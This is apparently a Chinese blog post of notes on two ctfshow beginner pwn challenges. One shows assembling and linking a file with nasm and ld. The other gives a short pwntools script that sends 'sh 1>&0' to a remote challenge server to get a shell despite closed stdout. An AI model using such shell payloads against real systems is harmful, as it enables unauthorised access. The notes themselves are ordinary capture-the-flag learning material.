ctfshow-pwn入门笔记

pwn15

该题目是很简单,总结一些需要的知识点:

  • 使用as手动编译asm文件
  • 使用ld手动链接可执行文件

文件下载后是一个名为flag.asm的文件
首先使用nasm命令编译为flag.o文件

nasm -f elf32 flag.asm -o flag.o
  • -f: 指定编译文件类型
  • -o: 指定编译后导出的文件名

编译后会生成一个flag.o文件,接着使用ld命令链接

ld -m elf_i386 -s flag.o -o flag
  • -m: 指定连接文件类型
  • -s: 最小输出
  • -o: 指定链接后输入的文件名

最后得到可执行文件运行得到flag

pwn19

改题目的表述为关闭了输出流,一定是最安全的吗?
使用ida分析

该程序我们输入一次值,然后就会在三秒后关闭
使用fclose()关闭了输出流,但是我们可以将输入的命令重定向到标准输入,例如1>&0,后面会通过read()读取我们输入的内容保存到buf变量,使用system执行命令,
在本地执行命令测试

接着exp如下

from pwn import *

io = remote("pwn.challenge.ctf.show",28219)

io.recv()

io.sendline("sh 1>&0")

io.interactive()

运行得到shell,cat /ctfshow_flag的到flag

posted @ 2024-04-29 10:49  Junglezt  阅读(30)  评论(0编辑  收藏  举报